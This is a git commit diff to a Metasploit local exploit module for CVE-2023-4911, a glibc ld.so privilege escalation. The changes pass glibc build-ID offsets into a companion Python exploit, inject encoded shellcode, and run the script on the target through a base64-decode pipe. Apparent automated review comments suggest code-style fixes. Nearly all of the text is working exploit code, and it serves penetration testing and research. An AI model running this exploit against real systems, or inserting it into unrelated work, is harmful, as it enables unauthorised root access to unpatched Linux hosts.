Responded to comments from jvoisin

This commit is contained in:
Jack Heysel 2023-12-19 13:50:09 -05:00
parent 96241f509a
commit b86df4820c
2 changed files with 18 additions and 19 deletions


@ -58,16 +58,7 @@ TARGETS = {
} }
# Magic offsets for build IDs can be found for versions of glibc by disabling ASLR and using the original PoC: https://haxx.in/files/gnu-acme.py # Magic offsets for build IDs can be found for versions of glibc by disabling ASLR and using the original PoC: https://haxx.in/files/gnu-acme.py
BUILD_IDS = { BUILD_IDS = METASPLOIT_BUILD_IDS
"69c048078b6c51fa8744f3d7cff3b0d9369ffd53": 561,
"3602eac894717d56555552c84fc6b0e4d6a4af72": 561,
"a99db3715218b641780b04323e4ae5953d68a927": 561,
"a8daca28288575ffc8c7641d40901b0148958fb1": 580,
"61ef896a699bb1c2e4e231642b2e1688b2f1a61e": 560,
"9a9c6aeba5df4178de168e26fe30ddcdab47d374": 580,
"e7b1e0ff3d359623538f4ae0ac69b3e8db26b674": 580,
"956d98a11b839e3392fa1b367b1e3fdfc3e662f6": 322,
}
libc = cdll.LoadLibrary("libc.so.6") libc = cdll.LoadLibrary("libc.so.6")
libc.execve.argtypes = c_char_p, POINTER(c_char_p), POINTER(c_char_p) libc.execve.argtypes = c_char_p, POINTER(c_char_p), POINTER(c_char_p)
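Review bot: The replacement `BUILD_IDS = METASPLOIT_BUILD_IDS` makes the script depend on a textual substitution done by the Ruby module, so running or testing the .py file on its own now raises NameError instead of failing gracefully, and nothing next to the line says so. Add a comment at that line such as `# Placeholder: the Metasploit module replaces METASPLOIT_BUILD_IDS with a {build_id: offset} dict literal at exploit time` so the next reader knows the constant is not a bug. The comment on the preceding line could also say that offsets must be added in the Ruby module's BUILD_IDS hash rather than here, since edits to this file are no longer picked up. The rendered text does not show the file name or path, so this is inferred from the `METASPLOIT_` placeholder naming and the matching gsub in the module.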


@ -18,8 +18,15 @@ class MetasploitModule < Msf::Exploit::Local
include Msf::Exploit::FileDropper include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck prepend Msf::Exploit::Remote::AutoCheck
BUILD_IDS = %w[69c048078b6c51fa8744f3d7cff3b0d9369ffd53 3602eac894717d56555552c84fc6b0e4d6a4af72 a99db3715218b641780b04323e4ae5953d68a927 a8daca28288575ffc8c7641d40901b0148958fb1 61ef896a699bb1c2e4e231642b2e1688b2f1a61e 9a9c6aeba5df4178de168e26fe30ddcdab47d374 e7b1e0ff3d359623538f4ae0ac69b3e8db26b674 956d98a11b839e3392fa1b367b1e3fdfc3e662f6] BUILD_IDS = {'69c048078b6c51fa8744f3d7cff3b0d9369ffd53' => 561,
'3602eac894717d56555552c84fc6b0e4d6a4af72' => 561,
'a99db3715218b641780b04323e4ae5953d68a927' => 561,
'a8daca28288575ffc8c7641d40901b0148958fb1' => 580,
'61ef896a699bb1c2e4e231642b2e1688b2f1a61e' => 560,
'9a9c6aeba5df4178de168e26fe30ddcdab47d374' => 580,
'e7b1e0ff3d359623538f4ae0ac69b3e8db26b674' => 580,
'956d98a11b839e3392fa1b367b1e3fdfc3e662f6' => 322
}
def initialize(info = {}) def initialize(info = {})
super( super(
update_info( update_info(
@ -71,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Local
'DisclosureDate' => '2023-10-03', 'DisclosureDate' => '2023-10-03',
'Notes' => { 'Notes' => {
'Stability' => [ CRASH_SAFE, ], 'Stability' => [ CRASH_SAFE, ],
'SideEffects' => [ ARTIFACTS_ON_DISK, ], 'SideEffects' => [ ],
'Reliability' => [ REPEATABLE_SESSION, ] 'Reliability' => [ REPEATABLE_SESSION, ]
} }
) )
@ -116,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Local
def check_ld_so_build_id def check_ld_so_build_id
# Check to ensure the python exploit has the magic offset defined for the BuildID for ld.so # Check to ensure the python exploit has the magic offset defined for the BuildID for ld.so
if command_exists?('file ') if command_exists?('file')
file_cmd_output = '' file_cmd_output = ''
# This needs to be split up by distro as Ubuntu has readlink and which installed by default but "ld.so" is not # This needs to be split up by distro as Ubuntu has readlink and which installed by default but "ld.so" is not
@ -128,14 +135,14 @@ class MetasploitModule < Msf::Exploit::Local
(file_cmd_output = cmd_exec('file $(ldconfig -p | grep -oE "/.*ld-linux.*so\.[0-9]*")')) (file_cmd_output = cmd_exec('file $(ldconfig -p | grep -oE "/.*ld-linux.*so\.[0-9]*")'))
end end
when 'debian' when 'debian'
(file_cmd_output = cmd_exec('file "$(readlink -f "$(command -v ld.so)")"')) (file_cmd_output = cmd_exec('file "$(readlink -f "$(command -v ld.so)")"'))
else else
fail_with(Failure::NoTarget, 'The module has not been tested against this Linux distribution') fail_with(Failure::NoTarget, 'The module has not been tested against this Linux distribution')
end end
if file_cmd_output =~ /BuildID\[.+\]=(\w+),/ if file_cmd_output =~ /BuildID\[.+\]=(\w+),/
build_id = Regexp.last_match(1) build_id = Regexp.last_match(1)
if BUILD_IDS.include?(build_id) if BUILD_IDS.keys.include?(build_id)
print_good("The Build ID for ld.so: #{build_id} is in the list of supported Build IDs for the exploit.") print_good("The Build ID for ld.so: #{build_id} is in the list of supported Build IDs for the exploit.")
else else
fail_with(Failure::NoTarget, "The Build ID for ld.so: #{build_id} is not in the list of supported Build IDs for the exploit.") fail_with(Failure::NoTarget, "The Build ID for ld.so: #{build_id} is not in the list of supported Build IDs for the exploit.")
@ -160,10 +167,11 @@ class MetasploitModule < Msf::Exploit::Local
# The python script assumes the working directory is the one we can write to. # The python script assumes the working directory is the one we can write to.
cd(datastore['WritableDir']) cd(datastore['WritableDir'])
shell_code = payload.encoded.unpack('H*').first shell_code = payload.encoded.unpack('H*').first
exploit_data = exploit_data('CVE-2023-4911', 'cve_2023_4911.py').gsub('METASPLOIT_SHELL_CODE', shell_code)
exploit_data = exploit_data('CVE-2023-4911', 'cve_2023_4911.py').gsub('METASPLOIT_SHELL_CODE', shell_code).gsub('METASPLOIT_BUILD_IDS', BUILD_IDS.to_s.gsub('=>', ':'))
# If there is no response from cmd_exec after the brief 15s timeout, this indicates exploit is running successfully # If there is no response from cmd_exec after the brief 15s timeout, this indicates exploit is running successfully
output = cmd_exec("$(echo #{Rex::Text.encode_base64(exploit_data)} |base64 -d | #{python_binary})") output = cmd_exec("echo #{Rex::Text.encode_base64(exploit_data)} |base64 -d | #{python_binary}")
if output.blank? if output.blank?
print_good('The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.') print_good('The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.')
else else
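Review bot: The hash is serialised with `BUILD_IDS.to_s.gsub('=>', ':')`, which ties the Python dict literal to the exact text of Ruby's Hash#inspect and would silently produce a broken literal if any key or value ever needed quoting differently; `BUILD_IDS.to_json` yields the same valid Python literal (`{"69c0...":561,...}`) without the string munging, and JSON is already loaded in the framework, so `.gsub('METASPLOIT_BUILD_IDS', BUILD_IDS.to_json)` is the safer form. Separately, this commit drops `ARTIFACTS_ON_DISK` from SideEffects while the module still includes FileDropper and `cd`s into WritableDir because "the python script assumes the working directory is the one we can write to"; if the script writes anything there during the exploit, the tag should stay or the module should register the files for cleanup. In check_ld_so_build_id, `BUILD_IDS.keys.include?(build_id)` allocates a key array on every call; `BUILD_IDS.key?(build_id)` is the idiomatic form, and the constant should end with `}.freeze` since it is shared mutable state. The exploit method and its `if output.blank?` branch continue past the end of this hunk.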